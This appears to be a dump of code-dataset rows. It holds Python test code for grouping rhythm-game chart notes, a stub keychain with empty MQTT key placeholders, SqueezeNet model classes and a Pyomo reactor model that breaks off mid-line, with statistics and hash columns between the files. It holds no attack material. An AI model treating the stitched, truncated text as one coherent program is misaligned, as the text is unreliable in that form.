[NoteWithTail(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD, tail_beat=Beat(10))],
[Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
[NoteWithTail(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(18))],
[NoteWithTail(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(16))],
[Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(16), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(18), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(19), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(19), column=3, note_type=NoteType.TAP)],
], grouped_notes)
def test_same_beat_notes_join_all(self):
grouped_notes = list(group_notes(
testing_valid_notes(),
same_beat_notes=SameBeatNotes.JOIN_ALL,
))
self.assertListEqual([
[
Note(beat=Beat(0), column=0, note_type=NoteType.TAP),
Note(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD),
],
[Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
[
Note(beat=Beat(4), column=0, note_type=NoteType.TAP),
Note(beat=Beat(4), column=1, note_type=NoteType.TAIL),
],
[Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
[
Note(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD),
Note(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD),
],
[Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(8), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(10), column=3, note_type=NoteType.TAIL)],
[Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
[
Note(beat=Beat(16), column=1, note_type=NoteType.TAIL),
Note(beat=Beat(16), column=2, note_type=NoteType.TAP),
],
[Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
[
Note(beat=Beat(18), column=0, note_type=NoteType.TAIL),
Note(beat=Beat(18), column=2, note_type=NoteType.TAP),
],
[
Note(beat=Beat(19), column=0, note_type=NoteType.TAP),
Note(beat=Beat(19), column=3, note_type=NoteType.TAP),
],
], grouped_notes)
def test_same_beat_notes_join_by_note_type(self):
grouped_notes = list(group_notes(
testing_valid_notes(),
same_beat_notes=SameBeatNotes.JOIN_BY_NOTE_TYPE,
))
self.assertListEqual([
[Note(beat=Beat(0), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(4), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(4), column=1, note_type=NoteType.TAIL)],
[Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
[
Note(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD),
Note(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD),
],
[Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(8), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(10), column=3, note_type=NoteType.TAIL)],
[Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(16), column=1, note_type=NoteType.TAIL)],
[Note(beat=Beat(16), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(18), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(18), column=2, note_type=NoteType.TAP)],
[
Note(beat=Beat(19), column=0, note_type=NoteType.TAP),
Note(beat=Beat(19), column=3, note_type=NoteType.TAP),
],
], grouped_notes)
def test_invalid_chart_join_heads_to_tails_raises(self):
self.assertRaises(
OrphanedNoteException,
list,
group_notes(testing_invalid_notes(), join_heads_to_tails=True),
)
def test_invalid_chart_keep_orphaned_heads_and_tails(self):
grouped_notes = list(group_notes(
testing_invalid_notes(),
join_heads_to_tails=True,
orphaned_head=OrphanedNotes.KEEP_ORPHAN,
orphaned_tail=OrphanedNotes.KEEP_ORPHAN,
))
self.assertListEqual([
[Note(beat=Beat(0), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(1), column=1, note_type=NoteType.HOLD_HEAD)],
[NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
[Note(beat=Beat(3), column=3, note_type=NoteType.ROLL_HEAD)],
[Note(beat=Beat(4), column=0, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(6), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(7), column=2, note_type=NoteType.HOLD_HEAD)],
], grouped_notes)
def test_invalid_chart_drop_orphaned_heads_and_tails(self):
grouped_notes = list(group_notes(
testing_invalid_notes(),
join_heads_to_tails=True,
orphaned_head=OrphanedNotes.DROP_ORPHAN,
orphaned_tail=OrphanedNotes.DROP_ORPHAN,
))
self.assertListEqual([
[NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
[Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
], grouped_notes)
def test_invalid_chart_drop_orphaned_heads_keep_orphaned_tails(self):
grouped_notes = list(group_notes(
testing_invalid_notes(),
join_heads_to_tails=True,
orphaned_head=OrphanedNotes.DROP_ORPHAN,
orphaned_tail=OrphanedNotes.KEEP_ORPHAN,
))
self.assertListEqual([
[Note(beat=Beat(0), column=0, note_type=NoteType.TAIL)],
[NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
[Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(6), column=0, note_type=NoteType.TAIL)],
], grouped_notes)
def test_invalid_chart_keep_orphaned_heads_drop_orphaned_tails(self):
grouped_notes = list(group_notes(
testing_invalid_notes(),
join_heads_to_tails=True,
orphaned_head=OrphanedNotes.KEEP_ORPHAN,
orphaned_tail=OrphanedNotes.DROP_ORPHAN,
))
self.assertListEqual([
[Note(beat=Beat(1), column=1, note_type=NoteType.HOLD_HEAD)],
[NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
[Note(beat=Beat(3), column=3, note_type=NoteType.ROLL_HEAD)],
[Note(beat=Beat(4), column=0, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(7), column=2, note_type=NoteType.HOLD_HEAD)],
], grouped_notes)
class TestUngroupNotes(unittest.TestCase):
def test_with_valid_grouped_notes(self):
notes = list(testing_valid_notes())
grouped_notes = group_notes(
notes,
same_beat_notes=SameBeatNotes.JOIN_ALL,
join_heads_to_tails=True,
)
ungrouped_notes = list(ungroup_notes(grouped_notes))
self.assertListEqual(notes, ungrouped_notes)
def test_with_invalid_grouped_notes(self):
grouped_notes = [
[NoteWithTail(
beat=Beat(0),
column=0,
note_type=NoteType.TAP,
tail_beat=Beat(2),
)],
[Note(beat=Beat(1), column=0, note_type=NoteType.TAP)],
]
note_ungrouper = ungroup_notes(grouped_notes)
self.assertRaises(OrphanedNoteException, list, note_ungrouper)
def test_keep_orphaned_notes(self):
grouped_notes = [
[NoteWithTail(
beat=Beat(0),
column=0,
note_type=NoteType.HOLD_HEAD,
tail_beat=Beat(2),
)],
[Note(beat=Beat(1), column=0, note_type=NoteType.TAP)],
]
ungrouped_notes = list(ungroup_notes(
grouped_notes,
orphaned_notes=OrphanedNotes.KEEP_ORPHAN,
))
self.assertListEqual([
Note(beat=Beat(0), column=0, note_type=NoteType.HOLD_HEAD),
Note(beat=Beat(1), column=0, note_type=NoteType.TAP),
Note(beat=Beat(2), column=0, note_type=NoteType.TAIL),
], ungrouped_notes)
def test_drop_orphaned_notes(self):
grouped_notes = [
[NoteWithTail(
beat=Beat(0),
column=0,
note_type=NoteType.HOLD_HEAD,
tail_beat=Beat(2),
)],
[Note(beat=Beat(1), column=0, note_type=NoteType.TAP)],
]
ungrouped_notes = list(ungroup_notes(
grouped_notes,
orphaned_notes=OrphanedNotes.DROP_ORPHAN,
))
self.assertListEqual([
Note(beat=Beat(0), column=0, note_type=NoteType.HOLD_HEAD),
Note(beat=Beat(2), column=0, note_type=NoteType.TAIL),
], ungrouped_notes)
| 44.280488
| 102
| 0.584687
| 1,859
| 14,524
| 4.369554
| 0.050027
| 0.13985
| 0.256063
| 0.17075
| 0.914317
| 0.901268
| 0.897329
| 0.87837
| 0.867167
| 0.847347
| 0
| 0.041058
| 0.268865
| 14,524
| 328
| 103
| 44.280488
| 0.723891
| 0
| 0
| 0.747541
| 0
| 0
| 0.012599
| 0
| 0
| 0
| 0
| 0
| 0.042623
| 1
| 0.04918
| false
| 0
| 0.013115
| 0.006557
| 0.07541
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9165a074903032d25c03ea86cdbe3da5abba3c4d
| 92
|
py
|
Python
|
rock_paper_scissors/rps.py
|
juanchaves/python_squad
|
5eac78ac5a5e5ccd179358366fdbbb3177a587ee
|
[
"MIT"
] | null | null | null |
rock_paper_scissors/rps.py
|
juanchaves/python_squad
|
5eac78ac5a5e5ccd179358366fdbbb3177a587ee
|
[
"MIT"
] | null | null | null |
rock_paper_scissors/rps.py
|
juanchaves/python_squad
|
5eac78ac5a5e5ccd179358366fdbbb3177a587ee
|
[
"MIT"
] | null | null | null |
'''
Rock, Paper, Scissors
'''
print('Hell and welcome to the rock, paper, scissors game!')
| 15.333333
| 60
| 0.673913
| 13
| 92
| 4.769231
| 0.769231
| 0.290323
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 92
| 5
| 61
| 18.4
| 0.805195
| 0.228261
| 0
| 0
| 0
| 0
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
9182426ec02a7214c7e1db2eb3f2d536c3667bfa
| 212
|
py
|
Python
|
lib/keychain_empty.py
|
JDWarner/pysense
|
586fd451a16f97d5397bdf346a160b8fa40f358b
|
[
"MIT"
] | null | null | null |
lib/keychain_empty.py
|
JDWarner/pysense
|
586fd451a16f97d5397bdf346a160b8fa40f358b
|
[
"MIT"
] | null | null | null |
lib/keychain_empty.py
|
JDWarner/pysense
|
586fd451a16f97d5397bdf346a160b8fa40f358b
|
[
"MIT"
] | null | null | null |
__all__ = ['MQTT_API_KEY',
'MQTT_WRITE_API_KEY',
'CHANNEL',
'wifi_ssid',
'wifi_pw']
MQTT_API_KEY = ""
MQTT_WRITE_API_KEY = ""
CHANNEL = ""
wifi_ssid = ''
wifi_pw = ''
| 17.666667
| 32
| 0.533019
| 25
| 212
| 3.8
| 0.36
| 0.252632
| 0.210526
| 0.294737
| 0.968421
| 0.968421
| 0.968421
| 0.968421
| 0.968421
| 0.968421
| 0
| 0
| 0.316038
| 212
| 11
| 33
| 19.272727
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
919a45d486878aa91c53fa232f09c4c5c06a67e9
| 255
|
py
|
Python
|
rastervision/data/label/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 4
|
2019-03-11T12:38:15.000Z
|
2021-04-06T14:57:52.000Z
|
rastervision/data/label/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | null | null | null |
rastervision/data/label/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 1
|
2021-12-02T08:07:21.000Z
|
2021-12-02T08:07:21.000Z
|
# flake8: noqa
from rastervision.data.label.labels import *
from rastervision.data.label.chip_classification_labels import *
from rastervision.data.label.object_detection_labels import *
from rastervision.data.label.semantic_segmentation_labels import *
| 36.428571
| 66
| 0.85098
| 32
| 255
| 6.59375
| 0.4375
| 0.303318
| 0.379147
| 0.473934
| 0.526066
| 0.526066
| 0
| 0
| 0
| 0
| 0
| 0.004255
| 0.078431
| 255
| 6
| 67
| 42.5
| 0.893617
| 0.047059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
91dedf9396fe27ca781cdbc1f3827437ef3cd792
| 7,820
|
py
|
Python
|
easyai/model/backbone/cls/squeezenet.py
|
lpj0822/image_point_cloud_det
|
7b20e2f42f3f2ff4881485da58ad188a1f0d0e0f
|
[
"MIT"
] | 1
|
2020-09-05T09:18:56.000Z
|
2020-09-05T09:18:56.000Z
|
easyai/model/backbone/cls/squeezenet.py
|
lpj0822/image_point_cloud_det
|
7b20e2f42f3f2ff4881485da58ad188a1f0d0e0f
|
[
"MIT"
] | 8
|
2020-04-20T02:18:55.000Z
|
2022-03-12T00:24:50.000Z
|
easyai/model/backbone/cls/squeezenet.py
|
lpj0822/image_point_cloud_det
|
7b20e2f42f3f2ff4881485da58ad188a1f0d0e0f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:
from easyai.base_name.backbone_name import BackboneName
from easyai.base_name.block_name import NormalizationType, ActivationType
from easyai.base_name.block_name import LayerType
from easyai.model.backbone.utility.base_backbone import *
from easyai.model.base_block.utility.utility_block import ConvActivationBlock
from easyai.model.base_block.cls.squeezenet_block import FireBlock
__all__ = ['SqueezeNet', 'DilatedSqueezeNet']
class SqueezeNet(BaseBackbone):
def __init__(self, data_channel=3, bnName=NormalizationType.BatchNormalize2d,
activationName=ActivationType.ReLU):
super(SqueezeNet, self).__init__()
self.set_name(BackboneName.SqueezeNet)
self.data_channel = data_channel
self.activationName = activationName
self.bnName = bnName
self.first_output = 64
self.create_block_list()
def create_block_list(self):
self.clear_list()
layer1 = ConvActivationBlock(in_channels=self.data_channel,
out_channels=self.first_output,
kernel_size=3,
stride=2,
padding=0,
dilation=1,
activationName=self.activationName)
self.add_block_list(layer1.get_name(), layer1, self.first_output)
layer2 = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=False)
self.add_block_list(LayerType.MyMaxPool2d, layer2, self.first_output)
planes = (16, 64, 64)
fire1 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire1.get_name(), fire1, output_channle)
planes = (16, 64, 64)
fire2 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire2.get_name(), fire2, output_channle)
layer3 = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=False)
self.add_block_list(LayerType.MyMaxPool2d, layer3, output_channle)
planes = (32, 128, 128)
fire3 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire3.get_name(), fire3, output_channle)
planes = (32, 128, 128)
fire4 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire4.get_name(), fire4, output_channle)
layer4 = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=False)
self.add_block_list(LayerType.MyMaxPool2d, layer4, output_channle)
planes = (48, 192, 192)
fire5 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire5.get_name(), fire5, output_channle)
planes = (48, 192, 192)
fire6 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire6.get_name(), fire6, output_channle)
planes = (64, 256, 256)
fire7 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire7.get_name(), fire7, output_channle)
planes = (64, 256, 256)
fire8 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire8.get_name(), fire8, output_channle)
def forward(self, x):
output_list = []
for block in self._modules.values():
x = block(x)
output_list.append(x)
return output_list
class DilatedSqueezeNet(BaseBackbone):
def __init__(self, data_channel=3, bnName=NormalizationType.BatchNormalize2d,
activationName=ActivationType.ReLU):
super().__init__()
self.set_name(BackboneName.DilatedSqueezeNet)
self.data_channel = data_channel
self.activationName = activationName
self.bnName = bnName
self.first_output = 64
self.create_block_list()
def create_block_list(self):
self.clear_list()
layer1 = ConvActivationBlock(in_channels=self.data_channel,
out_channels=self.first_output,
kernel_size=3,
stride=2,
padding=0,
dilation=1,
activationName=self.activationName)
self.add_block_list(layer1.get_name(), layer1, self.first_output)
layer2 = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=False)
self.add_block_list(LayerType.MyMaxPool2d, layer2, self.first_output)
planes = (16, 64, 64)
fire1 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire1.get_name(), fire1, output_channle)
planes = (16, 64, 64)
fire2 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire2.get_name(), fire2, output_channle)
layer3 = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=False)
self.add_block_list(LayerType.MyMaxPool2d, layer3, output_channle)
planes = (32, 128, 128)
fire3 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire3.get_name(), fire3, output_channle)
planes = (32, 128, 128)
fire4 = FireBlock(self.block_out_channels[-1], planes, activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire4.get_name(), fire4, output_channle)
layer4 = nn.MaxPool2d(kernel_size=3, stride=1, ceil_mode=False)
self.add_block_list(LayerType.MyMaxPool2d, layer4, output_channle)
planes = (48, 192, 192)
fire5 = FireBlock(self.block_out_channels[-1], planes, dilation=2,
activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire5.get_name(), fire5, output_channle)
planes = (48, 192, 192)
fire6 = FireBlock(self.block_out_channels[-1], planes, dilation=2,
activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire6.get_name(), fire6, output_channle)
planes = (64, 256, 256)
fire7 = FireBlock(self.block_out_channels[-1], planes, dilation=2,
activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire7.get_name(), fire7, output_channle)
planes = (64, 256, 256)
fire8 = FireBlock(self.block_out_channels[-1], planes, dilation=2,
activationName=self.activationName)
output_channle = planes[1] + planes[2]
self.add_block_list(fire8.get_name(), fire8, output_channle)
def forward(self, x):
output_list = []
for block in self._modules.values():
x = block(x)
output_list.append(x)
return output_list
| 43.20442
| 98
| 0.64335
| 904
| 7,820
| 5.323009
| 0.102876
| 0.097257
| 0.118454
| 0.079801
| 0.926642
| 0.905445
| 0.905445
| 0.891729
| 0.891729
| 0.891729
| 0
| 0.047872
| 0.254731
| 7,820
| 180
| 99
| 43.444444
| 0.777797
| 0.006266
| 0
| 0.834532
| 0
| 0
| 0.003476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043165
| false
| 0
| 0.043165
| 0
| 0.115108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37ea95674fb07f05727604ecac2ccb5cd7117b32
| 67,495
|
py
|
Python
|
sample_mods/bfb/bfb_abs_cons6vgdt.py
|
kuanhanl/cappresse
|
31cd7d03414a930f7e2c21e1a3eb5e7dd25cc500
|
[
"MIT"
] | 2
|
2019-09-26T20:56:06.000Z
|
2019-11-18T21:03:27.000Z
|
sample_mods/bfb/bfb_abs_cons6vgdt.py
|
kuanhanl/cappresse
|
31cd7d03414a930f7e2c21e1a3eb5e7dd25cc500
|
[
"MIT"
] | 6
|
2018-03-19T20:36:49.000Z
|
2018-04-13T15:27:29.000Z
|
sample_mods/bfb/bfb_abs_cons6vgdt.py
|
kuanhanl/cappresse
|
31cd7d03414a930f7e2c21e1a3eb5e7dd25cc500
|
[
"MIT"
] | 5
|
2018-10-04T18:51:02.000Z
|
2020-07-02T15:31:35.000Z
|
from __future__ import division
from pyomo.core.base import Constraint, sqrt, exp, Expression
from nmpc_mhe.aux.cpoinsc import collptsgen
from nmpc_mhe.aux.lagrange_f import lgr, lgry, lgrdot, lgrydot
"""
Version note implemented momentum balance and diffusive terms for the bubble region (gas)
"""
__author__ = 'David M Thierry @dthierry'
def fldoti_x(m, j, k, ncp, a, b):
return lgrdot(j, m.taucp_x[k], ncp, a, b)
def fldoti_t(m, j, k, ncp, a, b):
return lgrdot(j, m.taucp_t[k], ncp, a, b)
def fldotyi(m, j, k, ncp, a, b):
if j > 0:
return lgrydot(j, m.taucp_x[k], ncp, a, b)
else:
return 0.0
def flj1_x(m, j, ncp, a, b):
return lgr(j, 1, ncp, a, b)
def flj1_t(m, j, ncp, a, b):
return lgr(j, 1, ncp, a, b)
def fljy1(m, j, ncp, a, b):
if j > 0:
return lgry(j, 1, ncp, a, b)
else:
return 0.0
def f_lj_x(m, j, k, ncp, a, b):
return lgr(j, m.taucp_x[k], ncp, a, b)
def fir_hi(m, i):
reg = m.lenleft / m.nfe_x
return reg
def fl_irule(m, j, k):
h0 = sum(m.hi_x[i] for i in range(1, j))
return float(m.hi_x[j] * m.tau_i_x[k] + h0)
def fini_cp(i, y, k, taucp):
dy = y[i + 1] - y[i]
if i == 1 and k == 1:
yx = y[i]
# yx = dy * taucp[k] + y[i]
else:
yx = dy * taucp[k] + y[i]
return yx
def fini_cp_dv(i, y, k, taucp):
dy = y[i + 1] - y[i]
yx = dy * taucp[k] + y[i]
return yx
def gasout_zi_rule(m, fet, cpt, i):
return m.GasOut_z_ix[i]
# gas bubble
def ic_ngb_rule(m, ix, jx, c):
if 0 < jx <= m.ncp_x:
return m.Ngb[1, 0, ix, jx, c] == m.Ngb_ic[(ix, jx, c)]
else:
return Constraint.Skip
def ic_hgb_rule(m, ix, jx):
if 0 < jx <= m.ncp_x:
return m.Hgb[1, 0, ix, jx] == m.Hgb_ic[(ix, jx)]
else:
return Constraint.Skip
# gas cloud wake
def ic_ngc_rule(m, ix, jx, c):
if 0 < jx <= m.ncp_x:
return m.Ngc[1, 0, ix, jx, c] == m.Ngc_ic[(ix, jx, c)]
else:
return Constraint.Skip
def ic_hgc_rule(m, ix, jx):
if 0 < jx <= m.ncp_x:
return m.Hgc[1, 0, ix, jx] == m.Hgc_ic[(ix, jx)]
else:
return Constraint.Skip
# solid cloud wake
def ic_nsc_rule(m, ix, jx, c):
if 0 < jx <= m.ncp_x:
return m.Nsc[1, 0, ix, jx, c] == m.Nsc_ic[(ix, jx, c)]
else:
return Constraint.Skip
def ic_hsc_rule(m, ix, jx):
if 0 < jx <= m.ncp_x:
return m.Hsc[1, 0, ix, jx] == m.Hsc_ic[(ix, jx)]
else:
return Constraint.Skip
# gas emulsion
def ic_nge_rule(m, ix, jx, c):
if 0 < jx <= m.ncp_x:
return m.Nge[1, 0, ix, jx, c] == m.Nge_ic[(ix, jx, c)]
else:
return Constraint.Skip
def ic_hge_rule(m, ix, jx):
if 0 < jx <= m.ncp_x:
return m.Hge[1, 0, ix, jx] == m.Hge_ic[(ix, jx)]
else:
return Constraint.Skip
# solids emulsion
def ic_nse_rule(m, ix, jx, c):
if 0 < jx <= m.ncp_x:
return m.Nse[1, 0, ix, jx, c] == m.Nse_ic[(ix, jx, c)]
else:
return Constraint.Skip
def ic_hse_rule(m, ix, jx):
if 0 < jx <= m.ncp_x:
return m.Hse[1, 0, ix, jx] == m.Hse_ic[(ix, jx)]
else:
return Constraint.Skip
# expr ================================================================================================
# expr ================================================================================================
# gas cloud wake
# cc
def ngc_rule(m, it, jt, ix, jx, c):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ngc[it, jt, ix, jx, c] == \
m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * m.ed[it, jt, ix, jx] * \
m.cc[it, jt, ix, jx, c]
else:
return Constraint.Skip
# Tgc
def hgc_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hgc[it, jt, ix, jx] == \
m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * m.ed[it, jt, ix, jx] * \
sum(m.cc[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol * m.Tgc[it, jt, ix, jx]
else:
return Constraint.Skip
# solid cloud wake
# nc
def nsc_rule(m, it, jt, ix, jx, c):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Nsc[it, jt, ix, jx, c] == \
m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * m.rhos * \
m.nc[it, jt, ix, jx, c]
else:
return Constraint.Skip
# Tsc
def hsc_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hsc[it, jt, ix, jx] == \
m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * m.rhos * \
m.cps * m.Tsc[it, jt, ix, jx]
else:
return Constraint.Skip
# gas emulsion
# ce
def nge_rule(m, it, jt, ix, jx, c):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Nge[it, jt, ix, jx, c] == \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * m.ed[
it, jt, ix, jx] * \
m.ce[it, jt, ix, jx, c]
else:
return Constraint.Skip
# Tge
def hge_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hge[it, jt, ix, jx] == \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * m.ed[it, jt, ix, jx] * \
sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol * m.Tge[it, jt, ix, jx]
else:
return Constraint.Skip
# solids emulsion
# ne
def nse_rule(m, it, jt, ix, jx, c):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Nse[it, jt, ix, jx, c] == \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * \
(1. - m.ed[it, jt, ix, jx]) * m.rhos * \
m.ne[it, jt, ix, jx, c]
else:
return Constraint.Skip
# Tse
def hse_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hse[it, jt, ix, jx] == \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * \
